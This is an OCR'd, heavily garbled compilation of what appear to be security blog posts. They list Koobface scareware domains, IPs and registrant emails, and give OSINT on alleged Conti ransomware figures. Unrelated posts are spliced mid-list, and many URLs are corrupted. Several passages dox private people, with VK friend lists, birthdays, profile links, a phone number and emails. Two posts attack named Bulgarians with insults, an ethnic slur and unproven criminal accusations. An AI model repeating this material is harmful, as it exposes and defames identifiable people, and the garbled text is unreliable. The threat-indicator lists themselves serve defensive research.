been notified again, action should be taken shortly. The current domain portfolio including 
new ones parked there: 


ereuqba .cn - Email: spscript@hotmail.com 
eqoxyda .cn - Email: spscript@hotmail.com 
evouga .cn - Email: spscript@hotmail.com 
edivuka .cn - Email: spscript@hotmail.com 
ebeama .cn - Email: spscript@hotmail.com 
kebugac .cn - Email: spscript@hotmail.com 
eqoabce .cn - Email: spscript@hotmail.com 
kixyhce .cn - Email: spscript@hotmail.com 
cecyde .cn - Email: spscript@hotmail.com 
evybine .cn - Email: spscript@hotmail.com 
eqaone .cn - Email: spscript@hotmail.com 
dyqunre .cn - Email: spscript@hotmail.com 
byzivte .cn - Email: spscript@hotmail.com 
dovzyag .cn - Email: spscript@hotmail.com 
ebeozag .cn - Email: spscript@hotmail.com 
cafgouh .cn - Email: spscript@hotmail.com 
kebfoki .cn - Email: spscript@hotmail.com 
ebogumi .cn - Email: spscript@hotmail.com 
dyzani .cn - Email: spscript@hotmail.com 
dybapi .cn - Email: spscript@hotmail.com 
dusyti .cn - Email: spscript@hotmail.com 


dutsyvi .cn - Email: spscript@hotmail.com 
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[10] 


28023 


[11] 
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[12] 
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[13] 
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[14] 
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3 


‘4 Luba Lala, 


[15] 
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[16] 
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et yd 


——————— 


[17] 
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[18] 
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[19] 
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dutfij .cn - Email: spscript@hotmail.com 
bysivak .cn - Email: spscript@hotmail.com 


eqiovak .cn - Email: spscript@hotmail.com 


cecxoyk .cn - Email: spscript@hotmail.com 
dyqkuam .cn - Email: spscript@hotmail.com 
edamym .cn - Email: spscript@hotmail.com 
eqibuym .cn - Email: spscript@hotmail.com 
ducyqan .cn - Email: spscript@hotmail.com 
duzebyn .cn - Email: spscript@hotmail.com 
etyawjo .cn - Email: spscript@hotmail.com 
cerdiko .cn - Email: spscript@hotmail.com 
erauso .cn - Email: spscript@hotmail.com 
etuacwo .cn - Email: spscript@hotmail.com 
etuexyp .cn - Email: spscript@hotmail.com 
etywuq .cn - Email: spscript@hotmail.com 
ebejar .cn - Email: spscript@hotmail.com 
ebiuhas .cn - Email: spscript@hotmail.com 
dozabes .cn - Email: spscript@hotmail.com 
eqoybu .cn - Email: spscript@hotmail.com 
eviyzru .cn - Email: spscript@hotmail.com 
evaopsu .cn - Email: spscript@hotmail.com 
ebaetu .cn - Email: spscript@hotmail.com 
dytrevu .cn - Email: spscript@hotmail.com 


eboezu .cn - Email: spscript@hotmail.com 
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[20] 


28033 


[21] 
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I) i 
qs 


[22] 
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> 


[23] 
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[24] 
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[25] 
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[26] 
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[27] 
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Here’s a full list of his VK.com friends: 
Mikhail Tikhomirov 
Sergey Gromykhalov 
Alexander Smolentsev 
Yulia Sergeeva 

Dmitry Soshnikov 
Nataly Rouf-Trubetskaya 
Irina Vostroknutova 
Svyatoslav Polynchuk 
Ksenia Kuklina 

Alisa Vorobyeva 


Andryusha Palatnik 
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Oleg Zubov 

Kirill Shokin 

Kristina Shustova 
Svetlana Shantalova 
Albert Urbanovich 
Liza Tsarevskaya 
Masha Vaulina 
Dmitry Ogorodnikov 
Alexey Kozlov 

Anka Larikova 

Vera Ivanova 
Rituchcha Kuzmenko 
Ksenia Orlova 

Elena Sidorenko 
Katka Karakatka 
Vladimir Novikov 
Egor Sorokin 

Valeria Koturbach 
Antony Fortonov 
Danila Krivalev 
Lyubov Shupakova 
Vera Vorontsova 
Borya Pogrebnyak 
Andrey Pavlov 

Maria Sharapova 
Alexander YanovskyAl 
Andrey Vorontsov 
Elena Axyonova 

lya Skripka 

Natalya Markova 
Sergey Klimenko 
Anna Kimstach 
Elena Puchkova 
Maria Udovydchenko 
Yulia Lomakina 
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eruqav .cn - Email: spscript@hotmail.com 
eqoumiv .cn - Email: spscripbt@hotmail.com 
epuneyv .cn - Email: spscript@hotmail.com 
etykauw .cn - Email: spscript@hotmail.com 
ebeoxuw .cn - Email: spscript@hotmail.com 
eqidax .cn - Email: spscript@hotmail.com 
evaolux .cn - Email: spscript@hotmail.com 
cafropy .cn - Email: spscript@hotmail.com 
etyupy .cn - Email: spscript@hotmail.com 
kebquty .cn - Email: spscript@hotmail.com 
cakevy .cn - Email: spscript@hotmail.com 
eqouwy .cn - Email: spscript@hotmail.com 


epuvyiz .cn - Email: spscript@hotmail.com 


UPDATED - Monday, November 16, 2009: The Koobface gang is pushing [6]a new up- 
date, followed by a new portfolio of scareware redirectors and actual scareware serving 
domains. 


New portfolio of redirectors parked at [7]91.213.126.250: 
befree2 .cn - Email: gmk2000@yahoo.com 
scandinavianmall .cn - Email: admin@calen.be 
densityoze .cn - Email: admin@calen.be 

moored2009 .cn - Email: cael@newstile.it 

pica-pica .cn - Email: cael@newstile.it 
stroboscopicmovie .cn - Email: cael@newstile.it 


comedienne .cn - Email: admin@calen.be 
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Alexey Skripka 
Maxim Tischenko 
Liza Nikitina 
Andrey Kuzmin 
Elena Grigoryeva 
Viktoria Nesterova 
Alexander Shalin 
Lena Demenok 
Roman Kuzminov 
Kakhi Alexandrovich 
Irina Krotkevich 
Roman Karelin 
Zhanna Egorycheva 
Kirill Gilev 
Yana Polyanskaya 
Alexander Krotov 
Valeria Evdokimova 
Anton Shamray 
Yulia Mikhaylova 
Artem Nikitin 
Andrian Fedorov 
Maria Lemzhina 
Katya Filatova 
Svetlana Polynchuk 
Alexey Sobolev 
Andrey Dovgal 
Tatyana Voytyuk 
Anton Shokin 
Alexander Koltyshev 
Ksenia Markevits 
Inna Grigorschuk 
Innochka Etuvgi 
Roman Chernyakov 
Villi Xxx 
Andrey Smirnov 
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Anton Nazarkin 

Vasiliev Max 

Olesya Gavrilenko 
Alexander Efimov 
Margarita Odegova 
Oksana Sibirtseva 
Vladimir Goryainov 
Andrey Silin 

Dmitry Sibirtsev 

Tania BaikovaTania Baikova 
Maria Gomolyako-Malyshkina 
Antonina Sokirko 

Petr MorozovPetr Morozov 
Marianna KrelMarianna Krel 
Alexander Amiragov 
Vasily Evgenyevich 
Vladislav Chumakov 

Lena Titova 

Evgeny Atamanchuk 

Yana Gilyova 

Yury Epishev 

Pavel Zhelezov 

Yulya Baboshina 

Alexey Palkin 

Kirill Kostrov 

Ilya Shishko 

Marina Musiaka 

Anton Petryakov 

Dmitry Vorobyev 

Dmitry Tur 

Marat Sayfullin 

Natalya Korolkova 

Alexey Ivanov 

Natalya Sokolova 


Evgeny Andreev 
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Ekaterina Granich 
Maria Mironova 

Eldar Kambarov 
Alina M-Va 

Svetlana Shantalova 
Gala Galkina 

Anton Gusev 

Yulia Voloshenko 
Valeria Lyolya 

Dmitry Sinitsyn 

Alla Filimonova 
Volodya Sokolov 
Vadik Bichurinonline 
Inna Kirichuk 

Elena Liflyanskaya 
Pavel Novitsky 
Vladislava Gavrilashenko 
Ekaterina Morozova 
Sergey Ringzbenshteyn 
Komu Kak 

Alexander Arkhipov 
Nadezhda Baranova 
Anna Frejlev 

Sergey Anatolyevich 
Vladimir Demenok 
Yana Tkachenko 
Alexey Kolt 

Ksenia Belyakova 
Olga Varchenko 
Sabira Pozdnyakova 
Valeria Ovsyannikova 
Maxim Melnichenko 
Alexander Panaugye 
Maria Panaugye-Karnaukhova 


Olga Ivanova 
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Maria Makarenko 
Anna Avdeyko 
Valentina Yavtukhovskaya 
Denis Kurilov 

Slava Nepriyatel 
Ksenia Chertovikova 
Stas Kozlitin 

Andrey Levkovich 
Oleg Opryshko-Pavlov 
Vasily Tarabanko 

Lidia Alexandrova 
Yulia Nekhorosheva 
Veronika Salikova 
Zenit Spb 

Nikita Podgorbunskikh 
Olga Nagornaya 
Dmitry Abramov 
Margarita Andreeva 
Roman Gorkov 
Alexandra Nazarkina 
Sergei Laptenok 
Dmitry Momin 

Katya Lipka 

Yanka Ivanova 

Alexey Gorbachyov 
Alexey Opryshko 

Kirill Zalata 

Nina Ermolaeva 

Elena Prisyagina 

Oleg Savelyev 
Katerina Erkhan 
Alexander Doludenko 
Maria Galyazimova 
Yury Bochkaryov 
Yulechka Kalishevskaya 
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Sergey Zav 
Delovaya Delovashka 
Ded Mazai 
Alexander Kiselev 
Evgeny Vasilchenko 
Denis Baranov 
Evgeny Erofeev 
Vladimir Dalgeymer 
Alyona Doludenko 
Stanislav Kolyada 
Yulia Korolevaonline 
Vlad Malorossianov 
Alexandra Pavlova 
Anton Karpushinsky 
Shamil Guseynov 
Grigory Ruzanov 
Kirill Kalinin 
Svetlana Skripkina 
Elena Odinokova 
Viadlena Smolyakova 
Nikolay Korotchenko 
Olesya Gridinaonline 
Kirill Drobinkin 
Maria Chalaya 
Ivan Kalinin 
Andrey Nekrasov 
Anna Lyashenko-Dmitrieva 
Yulia Fatyushina 
Toshik Shestopalov 
Evgenia Zarkhozashvili 
Mikhail Klimenko 
Alexander Bodrov 
Rafaella Etranger 
Denis Lyashenko 
Ksenia Susleganova 
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Elena Koryagina 
Anastasia Sergeeva 
Olesya Kuprina 
Anastasia Rozganova 
Anna Lemke 

Vita Lika 

Oleg Ivanov 
Lyudmila Zhukova-Sverlova 
Andrey Solovyev 
Vera Kostyal 

Anna Rudeva 

Maria Izvekova 
Lena Izvekova 
Nikolay Logashenko 
Valery Fudin 

Villi Xxx 

Evgeny Lisienko 
Anton Baratov 
Brave Lion 
Viewtalay Fedorov 
Grant Babinyan 

Mir Bell 

Valeria Rozganova 
Pavlik Pavlik 
Stanislav Nazarenko 
Evgeny Net 
Natalya Voytenko 
Fyodor Providensky 
Anton Reutov 

Kirill Petrakov 
Natalia Kuleshova 
Roma Bochkarev 
Dmitry Basov 
Arvind Rasta 


Alexander Karelin 
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Viktoria Safronkina 
Aleks Skela 

Vitaly Kashapov 

Pavel Lemke 

Natali Natali 

Yulia Ten 

Tatyana Lyashenkoonline 
Roman Bochkarev 

Anna Lemke 

Stay tuned! 
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19.8.13 The Top Management of the Conti Ransomware Group’s Fashion and Charity 
Brands (2023-08-22 08:36) 


[1 


— 


28050 


AMIMYJIbC K KASH 


BAATOTBOPHTENbHbIN DOHA 


Remember my real time OSINT [2]Janalysis of the Conti Ransomware Gang’s internal leaked 
communication? 


Here are some additional details on the Top Management of some of their fashion and charity 
brands obtained using public sources. 


[3] 
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EVLo 


AeTCKaA ODCXLa 


Second image: 


[4] 
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densityoze .cn - Email: admin@calen.be 
furorcorner .cn - Email: cael@newstile. it 
ionisationtools .cn - Email: guzimi@brendymail.de 
wax-max .cn - Email: cael@newstile.it 
plate-tracery .cn - Email: guzimi@brendymail.de 
little-bitty .cn - Email: admin@calen.be 
night-whale .cn - Email: admin@calen.be 


scary-scary .cn - Email: gmk2000@yahoo.com 


Second redirectors portfolio at [8]91.213.126.102: 
disorganization000 .cn - Email: guzimi@brendymail.de 
rainbowlike .cn - Email: HuiYingTsui@airways.au 
skewercall .cn - Email: HuiYingTsui@airways.au 
wegenerinfo .cn - Email: guzimi@brendymail.de 
kangaroocar .cn - Email: HuiYingTsui@airways.au 
pericallis .cn - Email: HuiYingTsui@airways.au 
treasure-planet .cn - Email: guzimi@brendymail.de 


genusbiz .cn - Email: HuiYingTsui@airways.au 


Currently [9]pushing scareware from- primescanl .com ~-_ [10]83.133.124.149; 
[11]91.213.126.103; [12]83.133.119.84; [13]85.12.24.13. [14]Sampled scareware phones 
[15]back to windowsupdate8 .com/download/timesroman.tif - 88.198.105.145 and angle- 
meter .com/?b=1 (safewebnetwork .com) - 92.48.119.36. 


More scareware domains are parked on the same IPs: 


yourantivira7 .com - Email: j.wirth@smsdetective.com - [16]detection rate 
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Top Management Team Members of the Leylo Fashion Brand: 


[5] 
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Second image: 
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Sample Photo of their charity fund’s top management: 


[7] 


Stay tuned! 
1. https: //blogger. googleusercontent .com/img/a/AVvXsEgELT4jd9iFscxHEf sTUObPK1Z2gc7qJmw14JPxtNP6h7- j7yJrsMdY-0 


gyU-hkpXHtq67inRztEQ61LZdROP2CU_rBBnPxN-QI1YKZ4MmFPDwj 


2. https: //ddanchev. blogspot .com/search?q=contitransomware&x=0&y=0& 


3. https://blogger .googleusercontent .com/img/a/AVvXsEgTCt pF VsHUf y3MVrmYSPM2qGBaSy 9bXgw6MExEZA8mpdg j g0FwqJ8h5 


L£9zGpaUNbUOSp0bm1 TOUE8- TMuvj J3d7bbKGbK2sXqKCo-w4bjND 
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5, lctpe:/ blogger. googleusercontent.con/ing/a/ AV vksEncjOOAGy6TennyaVzaV-aGWKBOGKK_adVLBaGH230FAD4OD STHOGEN 
6, hvtps://blogger.googleusercontent.con/ing/a/ AV KsE4ExCEtQGH68;nVKinzkgEh@SgQllinscoalTJ8eG6-vq0aiFongbPEZ 


7. https://blogger .googleusercontent .com/img/a/AVvXsEij-GIFDYeYgZBZT_amb2a_DHhOdUkyvoGIpU80UmeEcTt jruSFxeBecB 


Suozug4mk5RdNL8Va3hGTwkNeKsLxrfaLVeueCOd5BWKhZe981D1 


4. https: //blogger .googleusercontent . com/img/a/AVVXsEjL35KbsIsNOaUwSMMEQn_18ErxBABcnKX8N-UNKbF6zr-SxxQz-wN6A 


19.8.14 Joining Abuse.ch’s Malware Bazaar Platform (2023-08-24 12:25) 


[1] 


Samples 12 


shared: 


Q 
“= First seen: 2022-11-06 05:02:55 UTC 


Last seen: Never 


Folks, 


I’ve recently [2]joined Abuse.ch’s Malware Bazaar Platform with the idea to share my actionable 
intelligence with the rest of the security community on a daily basis. 


Sample photos: 


[3] 
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GE s* of samples shared 


2023-08-23 2023-08-24 


[4] 


(eazaLoader {cont exe 
dancho_danchev 


(ouerLoader J cont | exe 
dancho_danchev 


[ouertoader] conti exe 4 
dancho_danchev 
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Pcont exe 


cont exe 


cont [ex] 


cont [ex] 


BuerLoader [7 
Peon ee 
Ransomware 


BuerLoader 4 
enc 


[6] 


dancho_danchev 


dancho_danchev 


dancho_danchev 


dancho_danchev 


dancho_danchev 


dancho_danchev 


HS «BuerLoader 
GW Unknown 
MM BazaLoader 
GS sTrickBot 


a, 


exe 

conti 
win.conti 
ransomware 


BuerLoader 
conti ransomware 
BazaLoader 


TrickBot 


signed 


Stat tuned! 


H 


https: //blogger .googleusercontent .com/img/a/AVvXsEgper QurZ2gGNgeHi y6q1N7FIDgqR8qF7txVzZ05uL30Tio5J9LiJO8CE 


6rMKsRc_o3R8CnC9M0arBGSY1q_WyyU1WDXt 1DpQOqmNBo7HKz4vj0 
. https://bazaar .abuse.ch/user/6798/ 


https: //blogger . googleusercontent .com/img/a/AVVXsEi8q2_XTHzuWPdbWIe1QmzGvQ5GXXxidun_lhmmpSE5pWKhvcUYa3jG2q 


k5_sTE4qS79iRei6TbvZa9cETAt yPghg2x0VXhfDWUnSXwKDV5-M1 


https: //blogger .googleusercontent .com/img/a/AVvXsEj 5IwY4FLrCTD2mxTxyvMdPcz0rd60ADOYLNewAujkDq96FYbsprzRly1 


. https: //blogger .googleusercontent .com/img/a/AVvXsEg61kt eU6AsAEBVpU2Vn0Gm0Chsiu_TnGhbkbShfRSrFxWFo21Y-_SZkb 
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19.8.15 Who’s Behind the Conti Ransomware Gang? (2023-08-27 17:35) 


[1] 


Re-defining the basics of real-time OSINT? 


Here’s how it’s done. Obtain quick access to a recently leaked internal communication courtesy 
of a major ransomware gang. Quickly attempt to data mine it looking for personally identifiable 
email address accounts and URLs then automatically visit these URLs and produce and publish 
high quality analysis on who’s behind the Conti Ransomware Gang. 


Here’s the analysis: 


[2] 
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[3] 


28061 


] 


4 


[ 
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web-scanm .com - Email: essi@calinsella.eu - [17]detection rate 
yourantivira3 .com (wwwsecurescanal .com) - Email: j.wirth@smsdetective.com 
primescan8 .com 

online-check-v11 .com 

antivir-scanl1 .com - Email: contact@armadastate.us 
antispy-scan1 .com - Email: contact@armadastate.us 
primescanl1 .com 

checkforspyware2 .com - Email: admin@calen.be 
pc-antispyware3 .com - Email: contact@spaintours.com 
premium-protection6 .com - Email: contact@spaintours.com 
antivir7 .com - Email: admin@maternitycloth.eu 
online-check-v7 .com 

beprotected8 .com - Email: admin@maternitycloth.eu 
pc-antispyware9 .com - Email: contact@spaintours.com 
online-check-v9 .com 

checkfileshere .com - Email: admin@calen.be 

scanfileshere .com - Email: admin@calen.be 

antivir-scano .com - Email: contact@armadastate.us 
check-files-now .com - Email: admin@calen.be 

antivir-scanz .com - Email: contact@armadastate.us 


antispy-scanz .com - Email: contact@armadastate.us 


ISP’s contributing the the monetization of Koobface have been notified. 


UPDATE: 991.212.107.103 has been taken offline courtesy of Blue Square Data Group Services 
Limited - [18]previous cooperation took place within a 3 hour period - with the Koobface gang 
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Leylo Fashion Brand 


Top Management: 


[5] 


28063 


Danil Ermolaev 


AAHUS] EPMOJIAEB 


hxxp://vk.com/id4874860 


Birthday: 7 August 1989 


[6] 
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[7] 
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] 


8 


[ 
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Maria Ermolaeva 
hxxp://vk.com/id7326657 
Birthday: 5 July 


BraroTBOpuTesbHbIN Mong «Mmnybc K KU3HH» 


[9] 
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AMIYJIbC K KA3HH 


BAATOTBOPUTENbHBIN DOHA 


hxxp://impulse-life.ru 

- TAMUJIA KEPAMOBA - BULIE-NPESUDEHT B® 
- Birthday: 4 April 1986 

- hxxp://vk.com/id6515862 

- Planet for beauty and development 


- [naHeTa 3a KpacoTy uv pa3ButTue 


[10] 
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[11] 


[12] 
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[15] 
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[16] 


28072 


migrating scareware operations to 93.174.95.191 (AS29073 ECATEL-AS , Ecatel Network) and 
188.40.52.181; 188.40.52.180 - (AS24940, HETZNER-AS Hetzner Online AG RZ) - ISPs have 
been notified. 


The .info scareware domain portfolio will be suspended within the next 24 hours. 


[19]Ali Baba and the 40 thieves LLC a.k.a [20]my Ukrainian "fan club", the one with the 
[21]Bahama botnet connection, the [22]recent malvertising attacks connection, and the 
current market leader of [23]black hat search engine optimization campaigns, has been 
keeping themselves busy over the past couple of weeks, continuing to add additional layers 
of legitimacy into their campaigns (bit.ly redirectors to blogspot.com accounts leading to 
compromised hosts), proving that if a cybercrime enterprise wants to, it can run its malicious 
operations on the shoulders of legitimate service providers using them as "virtual human 
shield" in order to continue its operations without fear of retribution. 


¢ Go through [24]Koobface Botnet’s Scareware Business Model - Part One 


Over the past two weeks, the Koobface gang once again indicated that it reads my blog, 
"appreciates" the ways | undermine the monetization element of their campaigns, and next 
to [25]redirecting Facebook’s entire IP space to my blog, they’ve also, for the first time ever, 
[26]moved from using my name in their redirectors, to typosquatting it. 


2810 


[17] 
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[18] 
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[19] 
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- NEWUW CAUQOBUY BAKAHAEB - BULIE-NPE3SUQEHT B® 
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[23] 
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- ANEKCAH GP LUVJIOB - NPEQCEQATEJIb NONEYUTEJIbCKOLO COBETA 


- Mpegacegatenb-NoneywuntenbcKkoro-coBeta 
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[25] 


BAATOAPE rBEHHO! 
nHucbMO 


maoey 
ry AwencamAponity 


Upuvna Bepxylwa 


- hxxp://irinaverhusha.com 


[26] 
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Ten: +7 926 536-63-68 


Email: impulse.life2020@gmail.com 


Related photos: 


[27] 
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\6bPASOGTMHbIMLBOR 
NPV NOAAEPKKE.CMM, 3BE321, TENEKAHATIOB 


Men 


HOMP 


B NOQAPOK IOBESINPHAS | 
V QPYTVE WEHHbIE NPM: 


Stay tuned! 
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19.8.16 About to Get Featured In a Popular Cyber Security Magazine 
(2023-08-30 10:26) 


[1 


— 
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Computer scanning process 


i) Shared Documents Col My Documents 
Hard drives 


System Tasks 


[2} View system information 
DS Add or remove programs 
GB Change a settings 


Other Places 
4 Local Otsk (C:) 4 Local Oisk (D:) 


OVD 


€Q My Network Places 
) My Documents 

©} Shared Documents 
GB Contrel Panel 


a 
(2 pw Ramorve €:) 
ae 


COUT rr) 
Now scanning: aactent.dil 


‘< Your Computer is Infected! 


Windows Internet Explorer 


Harmful spyware or adware software. ptchmerper ark pleat cerb pe Spee dhl Onrlines scan should install Cyber Securty 
Unites to fie your pc. Please cick OK to download and install Cyber Securty tool. 


C«_) 


Description: 
This program is potentally dangerous for your system. Trojan-Downloader stealing passwords, credit cards and other 
personal information from your computer. 


Advice: 
You need to remove this threat as soon as possible! 


For instance, the - now suspended - Koobface domain pancho-2807 .com is registered to 
Pancho Panchev, pancho.panchev@gmail.com, followed by rdr20090924 .info registered to 
Vancho Vanchev, vanchovanchev@mail.ru. As always, I’m totally flattered, and I’m still in a 
"stay tuned" mode for my very own branded scareware release - the Advanced Pro-Danchev 
Premium Live Mega Professional Anti-Spyware Online Cleaning Cyber Protection Scanner 
2010. 


It’s time to summarize some of the Koobface gang’s recent activities, establish a direct 
connection with the Bahama botnet, the [27]Ukrainian dating scam agency [28]Confidential 
Connections whose [29]botnet operations were linked to money-mule recruitment scams, 
with active domains part of their affiliate network parked at a Koobface-connected scareware 
serving domains, followed by the fact that they’re all responding to an IP involved in the 
ongoing U.S Federal Forms themed blackhat SEO campaign. It couldn’t get any uglier. 
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Dear folks. I’m about to get featured in a very prestigious cyber security magazine in a very 
prestigious edition. Unfortunately as I’m slowly transitioning into becoming an independent 
contractor again where most and the best of my research comes from I’m practically broke 
and | might need your assistance here. Anyone up to assist and support me here? Drop me a 
line and I’ll explain - dancho.danchev@hush.com 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEgoYgR91cnVBQpF zHewtFq1 AKEDdTTD JXSrV6f05k1Y_OeHXt6PmhYKu0 
ruoSwuCudPDQR6U9g6fYs4Q0U8 jnOwR-O_HIsDdUf 1EE9heLZe1MP 


19.9 September 


19.9.1 A Psychological Profile of Nicolay Sabchev/Nikolay Subchev Troyan, Bulgarian, 
A Wannabe Psychedelic Trance DJ - Part of the "Local Diships Gang" - From the 
Awesome But | Smell Like Dipshit Department - An Analysis (2023-09-04 01:47) 


[1] 
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This is from the "I sincerely apologies for this post but you robbed beated and home molested 
me and stole $85,000 with your savages friends from your and my hometown Troyan, Bulgaria 
without anyone knowing that also includes the police" department post. 


Does it smell like [2]dipships in Bulgaria or does it smells like dipshits in Bulgaria? Appreciate 
my rhetoric. It does but exactly where it does - in the toilet. 


T-Shirt - $1 
Haircut - $1 
Equipment - $1 


Sample photos: 


[3] 
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[6] 
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Total amount owed during the years for existence that’s so cool that cannot be appreciated 
due to logical and low life unappreciated existence where even nature cannot help you to "get 
high" - $0. How come? 


That’s life. 


1, 
2, hpe://Linkedin, con/in/auikoley-eebehed 

3. hepa: / fologger .googleusercontent.con/ing/a/AV sgt AR7jaTEih(70geTF1 4 OSTEVTanxCDnitheASRNGSAANRE@I20022 
4. hetps:/ blogger. googleusercontent.con/ing/a/AVvReEn<Whsp3R00A0q3E6TBly SHsQILL1 19¢b10eKi6T2vbDDIRAUPEAVG 
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5, httpe://blogger. googlouser content. con/ing/a/AVTaEiuin) jSU:laliyabeF_RFuaddvyzNavhet of vicrns ezs01L76Z7uTPd 
6. https: //blogger . googleusercontent . com/img/a/AVvXsEikuP3xmBtyTlVgepzw_7xc4UZhw2R1vW74Bcwxu0At00tQ18cwC788po 


19.9.2 Yavor Kolev (2023-09-04 01:48) 


[1] 


Is it a King or it Gypsy? No, it’s [2]Yavor Kolev. Gypsy Kings to the bottom of your brain’s out. 
Stay tuned! 


1. https: //blogger. googleusercontent.com/img/a/AVvXsEjmVolaWd0ff1lycQvhOtgUdAm0 j3vPPzX120jHjr6 jUcmp5t03Q2zYHH 


NzuBnOC1CkNWVqF yGESSzMquT0O1YQCFmfzY1A10ES6sgiwjwRYrPp 
2. https://linkedin.com/in/yavorkole 


19.9.3 The Conti Ransomware Gang and the Trickbot Cybercrime Enterprise XMPP’s 
and Jabber Account IDs (2023-09-08 13:07) 


The power of OSINT and real-time OSINT which has been my methodology since December, 
2005 when | originally launched this blog? Check out the following analysis courtesy of me 
which details in-depth who’s behind the [1]Conti Ransomware Gang and the [2] Trickbot cyber- 
crime enterprise using exclusively and entirely public sources of information in combination 
with my real-time OSINT methodology hence the results. 


[3] 
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@ 


megaprof@gmailcom 


——, — 
© ®& 
La~ kurochkina com artfreegallery com 
@) | 


finters.su + 


7 7 
< wa 
$23.su bakal-tour.su 


artfreegalery.us 


Sample XMPP and Jabber account IDs include: 
LiamNeeson@jabber.ru 
arb _reserved@ubuntu-jabber.de 
battletoad@jabbim.sk 
begemot sun@jabber.ru 
crazy digger@jabber.ru 
gfh6776@jabb.im 
ivanalert@jabber.ru 
landslide@jabb.im 
new _henry@jabber.cz 
scopehope@jabb.im 
ugly@1ljabber.com 
valeriuS2k@jabber.ru 
vdx17@jabber.ru 
337788@exploit.im 
asteradminn@sure.im 
benalen@exploit.im 
bio@yax.im 
crunch@exploit.im 
daiverjm@exploit.im 
dmanager@exploit.im 
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fuckUSAhahaha@exploit.im 
fuckusa@exploit.im 
gfh6776@jabb.im 
goldcoin@exploit.im 
jackiedugn@exploit.im 
landslide@jabb.im 
martiniden123@exploit.im 
mr _loki@exploit.im 

posi tron@exploit.im 
pravdazanami@exploit.im 
rob0660@conversations.im 
scopehope@jabb.im 
soulst@exploit.im 

time t@exploit.im 
trqa23rt@exploit.im 
volhvb@exploit.im 
yastreb@exploit.im 
SamCodeSign@xmpp.jp 
alieelu@xmpp.jp 
baton@xmpp.jp 
batono@xmpp.jp 
benalien@xmpp.jp 
cosm123@xmpp.jp 
graddds@xmpp.jp 
guliver@xmpp.sh 
liamliam@xmpp.jp 
ohmygod728@xmpp.jp 


It gets even better with the recent [4JOFAC sanctions that also mention several interesting 
email address accounts: 


volhvb@mail.ru 
volhvb@live.ru 
volhvb@yandex.ru 
volhvb@gmail.com 
rfonin@gmail.com 
mfonin@jabber.ru 
tsarev89@gmail.com 
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megaprof@gmail.com 
refflex@gmail.com 


It gets even more interesting when we dig a little bit deeper and find related domain registra- 
tions associated with these email address accounts. 


For instance we have hxxp://baikal-tour.su which is a travel agency and hxxp://kurochkina.com 
which is Ekaterina Kurochkina who is a fashion photographer currently known as Valentina 
Ushenina currently a training instructor at the PortDeBras company where we have the same 
domains registered by a known individual on the Conti Ransomware Gang’s sanctions list 
(megaprof@gmail.com). 

We also have a Google Play application (hxxp://play.google.com/store/apps/detai- 
Is?id=com.WSCards.RSP & &gl=US) that also points to (hxxp://finters.su) which stands 
for an international sports organization. 

Personally identifiable information on Valentina Ushenina include: 

Skype: valentinatigra 

hxxp://vk.com/id3151577 

Email: kyrochkina.sug@mail.ru; tkanikurik@yahoo.com 

Sample photos of Valentina Ushenina include: 


[6] 
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[7] 
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fi Cyber Security Installer 


This program will download and install Cyber 
§ Security on your PC. 


By clicking Continue button you accepting our 


As of recently the gang has migrated to a triple-layer of legitimate infrastructure, consisting 
of bit.ly redirectors, leading to automatically registered Blogspot account which redirect to 
Koobface infected hosts serving the Koobface binary and the redirecting to a periodically 
updated scareware domain. Here are some of the domains involved. 


Ongoing campaing dynamically generating bit.ly URLs redirecting to automatically regis- 
tered Blogspot accounts, using the following URLs: 


bit.ly /VumFK -> drbryanferazzoli .blogspot.com 
bit.ly /IJcK3 -> toyetoyebalnaja .blogspot.com 

bit.ly /3mFyzs -> raimeishelkowitz .blogspot.com 
bit.ly /2wuSPj -> kelakelamccovery .blogspot.com 
bit.ly /2Pnn8l -> pattyedevero .blogspot.com 

bit.ly /2wuSPj -> kelakelamccovery .blogspot.com 
bit.ly /1HDmbm -> malinegainey-green. blogspot.com 
bit.ly /2xf5vB -> advaadvarukuni .blogspot.com 

bit.ly /3mFyzs -> raimeishelkowitz .blogspot.com 
bit.ly /2xf5vB -> advaadvarukuni .blogspot.com 

bit.ly /46pcCl -> paulangelogaetano .blogspot.com 
bit.ly /1HDmbm -> malinegainey-green .blogspot.com 
bit.ly /3J)ZsDD -> derieuwsdarrius .blogspot.com 


bit.ly /IJcK3 -> toyetoyebalnaja .blogspot.com 
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Ajj, 
Ad lLWiWigs sa 
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[11] 


[12] 


28095 


[13] 
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[14] 
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[15] 
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[16] 


All known domains known to have been registered by megaprof@gmail.com include: 
hxxp://artfreegallery.us 

hxxp://artfreegallery.com 

hxxp://kurochkina.com 

hxxp://S23.su 

hxxp://baikal-tour.su 

hxxp://finters.su 

All known domains known to have been registered by tsarev89@gmail.com include: 
hxxp://art-deko. biz 

hxxp://serpwomanhealth.info 

hxxp://avtofortuna.info 

hxxp://knigodvor.info 

hxxp://alkommet.com 

hxxp://art-deko. info 


[17] 
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tsarev89@gqmail.com 


® 


art-deko.info knigodvor.info avto fortuna. info 


® © 


serpwomanheatth. info art-deko. biz alkommet.com 


Stay tuned! 
1. https: //ddanchev.blogspot .com/search?q=conti 


2. https: //ddanchev. blogspot .com/2022/03/exposing-trickbot-malware-gang-osint.htm 
https: //blogger .googleusercontent .com/img/b/R29vVZ2x1/AVVXsEhEJNumGYh4 JrX1nEKsXguRuzEwiWEx3N14sHRPbOSUvbDMQ 
jvogldDLm1GYdIXicCxEUGIM1gsV6D_Hjwmg23np1xfcVjcL-F71W_ 


: 


https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEg-Knwr2AaawI X61KDaVs2030c6Q061Ra7LLIKVnV45pehr 
bUi7eZ_9d49pPuikuk1058daDCb8iAXXTgOnk jhWBGAsfUzj2MJmtZ 


https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEidNYd1AZMO JLhomT- CwMDKXhnknYagdazRONMzB6D5xEXxw8 
£XxBFSSs6dTP3Surq0dQ3SxQGi YQVNiDOP8CQiT5mxXFKbO1 jBOIOT 
https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiwe461siz6Ls15YPmx_pfXGi8XP9PZ60PIZMDCV1qReh jd 
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https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEiVhX3qv7TyVvYth5- jW1D8VAmG9Gykg0140bGo0PW1YEfpB 
2-DR56_5ELFByyzjedb8C8080_ZV1PEA6i6ifT1f£TuTYK2g2g¢6WCd 
https: //blogger. googleusercontent.com/img/b/R29VZ2x1/AVvXsEgs2AKmGR61iXtNYn-5r2yVY2rAfHUC7koBDuUcwJa6A1-y 
